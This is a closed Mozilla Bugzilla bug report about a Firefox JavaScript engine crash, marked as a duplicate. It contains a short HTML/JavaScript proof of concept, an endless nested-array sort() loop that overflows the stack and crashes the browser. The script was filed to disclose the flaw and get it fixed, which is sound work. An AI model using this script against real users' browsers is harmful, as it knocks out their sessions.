Closed Bug 272296 Opened 21 years ago Closed 21 years ago

nested array sort() loop Stack overflow exception = crash and burn

Categories

(Core :: JavaScript Engine, defect)

Product:
Core
Component:
JavaScript Engine
Platform:
x86
Windows XP
Type:
defect
Priority:
Not set
Severity:
critical

Tracking

()

Status:
VERIFIED DUPLICATE of bug 271716

People

(Reporter: bugzilla, Unassigned)

References

(
URL
)

Details

(Keywords: crash)

Attachments

(1 file)

This will CRASH your browser!
175 bytes, text/html
Details
from: http://www.edup.tudelft.nl/~bjwever/advisory_firefox_flaws.html and http://www.securityfocus.com/archive/1/382262 <HTML> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> <SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT> </HTML>
Severity: normal → critical
Summary: nested array sort() loop Stack overflow exceptio → nested array sort() loop Stack overflow exception = crash and burn
This will CRASH your browser!
Stop filing dups, please -- check first with bugzilla, it can help you find 'em. Without more data about stack signature, I'm going to dup against the likeliest target, bug 271716. /be *** This bug has been marked as a duplicate of 271716 ***
Status: NEW → RESOLVED
Closed: 21 years ago
Resolution: --- → DUPLICATE
v
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.

Attachment

General

Creator:
Created:
Updated:
Size: